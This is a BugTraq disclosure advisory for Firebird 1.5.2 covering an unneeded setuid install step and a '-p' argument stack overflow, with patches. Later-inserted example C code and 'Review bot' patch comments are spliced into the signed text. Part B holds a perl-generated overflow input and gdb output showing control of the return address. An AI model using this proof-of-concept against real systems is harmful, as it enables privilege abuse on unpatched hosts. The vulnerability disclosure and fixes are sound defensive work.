BugTraq
Buffer Overflow and Installation Script Error in Firebird 1.5.3 Mar 12 2006 03:56PM
Joxean Koret (joxeankoret yahoo es)
Hi to all!

In the latest Firebird release (1.5.3) various security problems have
been fixed. Attached is an advisory about two of these.

---
Joxean Koret

---------------------------------------------------------------------------

Buffer Overflow and Installation Script Error in Firebird 1.5.3

---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)

Date: 2005-02-18

Location: Basque Country

---------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Product: Firebird

Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs
on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent
concurrency, high performance, and powerful language support for stored
procedures and triggers. It has been used in production systems, under a variety
of names, since 1981.

Web : http://firebird.sourceforge.net

---------------------------------------------------------------------------

Vulnerability List:

~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:

~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecessarily

- The installation script of Firebird 1.5.2 makes the binaries fb_inet_server
and fbserver suid firebird, but this is unnecessary. If you take a look at the
install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see the
following lines:

(...)
# SUID is still needed for group direct access. General users
# cannot run though.
for i in fb_lock_mgr gds_drop fb_inet_server
do
    if [ -f $i ]
    then
        chmod ug=rx,o= $i
        chmod ug+s $i
    fi
done
(...)

However, as the developer quoted below says, fb_inet_server (at least) does not
need to be suid firebird. The following is a fragment of the response of Alex
Peshkov (a Firebird developer) about this problem:

> They need not and should not be set*id. And in the standard precompiled
> binaries fbserver is not setuid. But for reasons unknown to me
> fb_inet_server is made setuid 'firebird' by the install script (the Debian
> guys fixed it, I think). I noticed it, unfortunately, after the release of
> 1.5.2, but will definitely fix it in future releases. Besides the security
> vulnerability, this brings an additional problem when one wants to change
> the fb_inet_server run-user: changing only the xinetd.d entry is not enough.

- Debian distributions are not vulnerable to this problem; as Alex Peshkov says,
the Debian people have fixed it.
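A quick way to check an installation for this class of problem is to list the set*id files in the Firebird bin directory and see which account owns them. The C program below is an added example, not part of the advisory or of Firebird: it scans one directory, reports every setuid/setgid regular file with its permission bits and owner, and flags those owned by a non-root account such as 'firebird'. The default directory and the file names in the comments are placeholders taken from the advisory's session.

```c
/* Added example (not from the advisory or Firebird): audit a directory for
 * setuid/setgid regular files and flag those owned by a non-root account, the
 * condition the advisory describes for fb_inet_server ("suid firebird").
 * The default directory below is a placeholder. */
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum setid_class { NOT_SETID = 0, SETID_ROOT = 1, SETID_NONROOT = 2 };

/* Classify a file from its stat() data. Only regular files matter here (a
 * setgid directory is a different mechanism). A set*id file owned by a
 * non-root service account is still a privilege boundary: anyone who can
 * execute it acts with that account's rights, which is exactly the exposure
 * the advisory's section B exploits. */
enum setid_class classify_setid(const struct stat *st)
{
    if (!S_ISREG(st->st_mode))
        return NOT_SETID;
    if ((st->st_mode & (S_ISUID | S_ISGID)) == 0)
        return NOT_SETID;
    return st->st_uid == 0 ? SETID_ROOT : SETID_NONROOT;
}

/* Scan one directory (non-recursive), print each set*id regular file with its
 * permission bits and owner, and return how many were found; -1 if the
 * directory cannot be opened. */
int scan_setid(const char *dir)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;

    int found = 0;
    struct dirent *ent;
    char path[4096];
    while ((ent = readdir(d)) != NULL) {
        struct stat st;
        snprintf(path, sizeof path, "%s/%s", dir, ent->d_name);
        if (lstat(path, &st) != 0)
            continue;                       /* unreadable entry: skip it */
        enum setid_class c = classify_setid(&st);
        if (c == NOT_SETID)
            continue;
        found++;
        printf("%s  mode %04o  uid %u  %s\n", path,
               (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid,
               c == SETID_ROOT ? "set*id root" : "set*id NON-ROOT (review!)");
    }
    closedir(d);
    return found;
}

int main(int argc, char **argv)
{
    /* Placeholder default: the bin directory shown in the advisory's session. */
    const char *dir = argc > 1 ? argv[1] : "/usr/lib/firebird2/bin";
    int n = scan_setid(dir);
    if (n < 0) {
        perror(dir);
        return EXIT_FAILURE;
    }
    printf("%d set*id file(s) in %s\n", n, dir);
    return EXIT_SUCCESS;
}
```

Run it against the directory the package installed into; after applying the install-script patch from this advisory and re-running the post-install step, fb_inet_server should no longer be reported, while fb_lock_mgr and gds_drop (which the script still marks set*id on purpose) will be.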

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

- The '-p' argument of the fb_inet_server and fbserver binaries is vulnerable
to a buffer overflow. If a string of more than 150 characters is passed to the
'-p' parameter of either binary, the program crashes with a
"Segmentation fault" message.

- The following is a test of the vulnerability:

/usr/lib/firebird2/bin$ ls
fb_lock_print fbguard fbmgr fbmgr.bin fbserver gsec
/usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
Segmentation fault

The program dies abruptly. The bytes passed from position 155 to 159
overwrite the return address:

/usr/lib/firebird2/bin$ gdb ./fbserver
GNU gdb 6.3
(...)
(gdb) run -p `perl -e 'print "a"x155;'`4321
Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print "a"x155;'`4321
(...)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1210892160 (LWP 25358)]
0x31323334 in ?? ()

We have overwritten the return address with the bytes 0x31 0x32 0x33 0x34: the
ASCII codes of the digits 4 3 2 1 in reverse (little-endian) byte order.

(gdb) where
#0  0x31323334 in ?? ()
#1  0x08233496 in ?? ()
#2  0x00000000 in ?? ()
#3  0xbffff9b0 in ?? ()
#4  0x00006161 in ?? ()
#5  0x00000000 in ?? ()
#6  0x00000000 in ?? ()
#7  0x00000000 in ?? ()
#8  0x00000000 in ?? ()
#9  0x00000000 in ?? ()
#10 0xbffff9b0 in ?? ()
#11 0x00000000 in ?? ()
#12 0x00000000 in ?? ()
#13 0x00000000 in ?? ()
#14 0xbffffb04 in ?? ()
#15 0x0804e370 in ?? ()
#16 0x00000000 in ?? ()
#17 0xbffffd50 in ?? ()
#18 0x00000000 in ?? ()
#19 0x00000000 in ?? ()
#20 0x00000000 in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
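The crash above is the classic result of formatting a caller-controlled argument into a fixed-size stack buffer with no length check. The following C program is an added example, not code from the advisory or from Firebird: it contrasts the unbounded sprintf() pattern with the bounded strncat() form used in the 1.5.3 fix (see the inet_server.cpp patch later in this advisory) and with a stricter variant that rejects over-long input instead of truncating it. PROTOCOL_BUF_SIZE (64) is an assumed size chosen for illustration; the advisory does not give the real size of the protocol buffer, only that more than 150 characters crashes the server.

```c
/* Added example (not Firebird code): the unbounded sprintf() pattern behind the
 * -p overflow versus two bounded replacements. PROTOCOL_BUF_SIZE is an assumed
 * size chosen for illustration; the advisory does not state the real size of
 * the protocol[] buffer in inet_server.cpp. */
#include <stdio.h>
#include <string.h>

#define PROTOCOL_BUF_SIZE 64   /* assumption, see above */

/* sprintf(protocol, "/%s", arg) writes strlen(arg) + 2 bytes: the slash, the
 * argument and the terminating NUL. Computing that count instead of performing
 * the write lets us measure the overrun without corrupting the stack. */
size_t sprintf_bytes_needed(const char *arg)
{
    return strlen(arg) + 2;
}

/* Returns 1 if the original sprintf() call would write past a buffer of
 * PROTOCOL_BUF_SIZE bytes, 0 otherwise. */
int would_overflow(const char *arg)
{
    return sprintf_bytes_needed(arg) > PROTOCOL_BUF_SIZE;
}

/* Mirrors the 1.5.3 fix: seed the buffer with "/" and append at most the
 * remaining space minus one byte (reserved for the NUL). Cannot overflow, but
 * an over-long argument is silently cut short. Returns 1 when that happened. */
int set_protocol_truncating(char *protocol, size_t size, const char *arg)
{
    protocol[0] = '/';
    protocol[1] = '\0';
    strncat(protocol, arg, size - strlen(protocol) - 1);
    return strlen(arg) > size - 2;
}

/* Stricter alternative: refuse input that does not fit so the caller can emit
 * a usage error instead of starting the server with a mangled protocol path.
 * Returns 0 on success, -1 if the argument is too long. */
int set_protocol_strict(char *protocol, size_t size, const char *arg)
{
    size_t len = strlen(arg);
    if (len > size - 2)
        return -1;
    protocol[0] = '/';
    memcpy(protocol + 1, arg, len + 1);   /* copies the NUL too */
    return 0;
}

int main(void)
{
    /* Constructed input modelled on the advisory's test: 155 'a's then "1234". */
    char arg[160];
    memset(arg, 'a', 155);
    memcpy(arg + 155, "1234", 5);

    char protocol[PROTOCOL_BUF_SIZE];
    printf("sprintf would write %zu bytes into a %d-byte buffer: %s\n",
           sprintf_bytes_needed(arg), PROTOCOL_BUF_SIZE,
           would_overflow(arg) ? "OVERFLOW" : "fits");
    int truncated = set_protocol_truncating(protocol, sizeof protocol, arg);
    printf("strncat form: \"%s\" (truncated=%d)\n", protocol, truncated);
    printf("strict form: %s\n",
           set_protocol_strict(protocol, sizeof protocol, arg) == 0
               ? "accepted" : "rejected");
    return 0;
}
```

The strncat form is what the upstream patch does and it closes the memory-safety bug; the strict form is the variant a reviewer would usually ask for, because a truncated protocol path is a configuration error that should be reported rather than quietly accepted.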

Notes:

~~~~~~

- Various other problems, not discovered by me, have been fixed in the 1.5.3
version. I encourage you to upgrade to the newest version as soon as possible.

Patches for the 1.5.2 version:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- The following patches solve ONLY the problems that I have found.

Patch for installation script:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------

--- scripts/postinstall.sh 2005-03-25 14:24:40.091819144 +0100

+++ scripts/postinstall.sh.corrected 2005-03-25 14:08:47.777592912 +0100

@@ -401,7 +401,7 @@

# SUID is still needed for group direct access. General users

# cannot run though.

- for i in fb_lock_mgr gds_drop fb_inet_server

+ for i in fb_lock_mgr gds_drop

do

if [ -f $i ]

then
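Review bot: the loop at line 401 drops fb_inet_server from the set*id list but leaves the comment "# SUID is still needed for group direct access" unchanged, so a later maintainer has no record of why fb_inet_server was removed; add a one-line comment stating that fb_inet_server must not be set*id (its run-user is meant to be controlled by the xinetd.d entry, as the advisory notes). Note also that fbserver never appears in this loop, so the advisory's claim that the script makes fbserver suid is not backed by this hunk.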

@@ -508,7 +508,7 @@

# SUID is still needed for group direct access. General users

# cannot run though.

- for i in fb_lock_mgr gds_drop fb_inet_server

+ for i in fb_lock_mgr gds_drop

do

if [ -f $i ]

then
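Review bot: this is the same edit as the hunk at line 401 applied to a second copy of the loop at line 508; the duplication means any future change to the set*id list must be made twice, so consider hoisting the list into one variable (e.g. `SETID_BINS="fb_lock_mgr gds_drop"`) used by both loops. The patch does cover both copies, which is what matters for the fix itself.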

---------------------END OF THE PATCH------------------------------

Patch for fb_inet_server and/or fbserver buffer overflow:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------

--- src/remote/inet_server.cpp 2004-09-29 12:03:39.000000000 +0200

+++ src/remote/inet_server.cpp.corrected 2005-03-25 14:17:59.698688152 +0100

@@ -32,7 +32,7 @@

*

*/

/*

-$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $

+$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $

*/

#include "firebird.h"

#include "../jrd/ib_stdio.h"
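Review bot: this hunk changes only the CVS $Id keyword line and has no effect on behaviour. It does record that the corrected file is revision 1.26.2.3 committed 2005/03/23 by alexpeshkoff, consistent with the timeline entry "2005-03-25: BOF (and various others) fixed in CVS", so keep it if the intent is to show provenance; otherwise drop it to keep the patch minimal.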

@@ -277,7 +277,10 @@

break;

case 'P':

- sprintf(protocol, "/%s", *argv++);

+ protocol[0] = '/';

+ protocol[1] = 0;

+ strncat(protocol, *argv++,

+ sizeof(protocol) - strlen(protocol) - 1);

break;

case 'H':
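Review bot: the bounded copy is correct only if `protocol` is a true array in this scope, because `sizeof(protocol) - strlen(protocol) - 1` yields the remaining space only when `sizeof` sees the array rather than a pointer; the declaration is outside the hunk, so confirm it. With `protocol` set to "/" the expression is `sizeof(protocol) - 2`, which leaves room for the terminating NUL, so the overflow is closed. What remains is silent truncation: an over-long `-p` value now yields a shortened path with no diagnostic, so consider checking `strlen(*argv)` against the buffer first and rejecting the argument with a usage error instead of truncating.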

@@ -407,12 +410,9 @@

/* before starting the superserver stuff change directory to tmp */

if (CHANGE_DIR(TEMP_DIR)) {

- char err_buf[1024];

-

/* error on changing the directory */

- sprintf(err_buf, "Could not change directory to %s due to errno %d",

+ gds__log("Could not change directory to %s due to errno %d",

TEMP_DIR, errno);

- gds__log(err_buf);

}

/* Server tries to attash to security.fdb to make sure everything is OK
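Review bot: besides removing the 1024-byte stack buffer, this hunk fixes a format-string hazard: the old code passed the already-formatted `err_buf` as the first argument of `gds__log(err_buf)`, i.e. as the format string, so any '%' in `TEMP_DIR` would have been interpreted as a conversion. Passing the literal format with `TEMP_DIR, errno` as arguments is the right shape, provided `gds__log` is printf-like (its varargs signature is implied by the new call but not visible in the hunk). Unrelated: the context line reads "attash" for "attach"; fix that separately rather than in this patch.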

---------------------END OF THE PATCH------------------------------

The fix:

~~~~~~~~

The problems are fixed in the current 1.5.3 version of the Firebird binary
distribution.

Thanks

~~~~~~

Thanks to Alex Peshkov, who was very kind and professional.

Timeline:

~~~~~~~~~

2005-02-18: Initial contact.
2005-02-11: Contact with Alex Peshkov.
2005-03-25: BOF (and various others) fixed in CVS.
2005-03-25: Wait for ~2 months after the 1.5.3 release.
2006-01-25: Firebird 1.5.3 released.
2006-03-12: Public disclosure.

Disclaimer:

~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:

~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQBEFESXU6rFMEYDrlERAnZSAJsGRkt+NgzbtThNsTZeRjk65kccWwCfQ6wd
nCuCfMINja0ayNIRAuXoUdU=
=5ERM
-----END PGP SIGNATURE-----
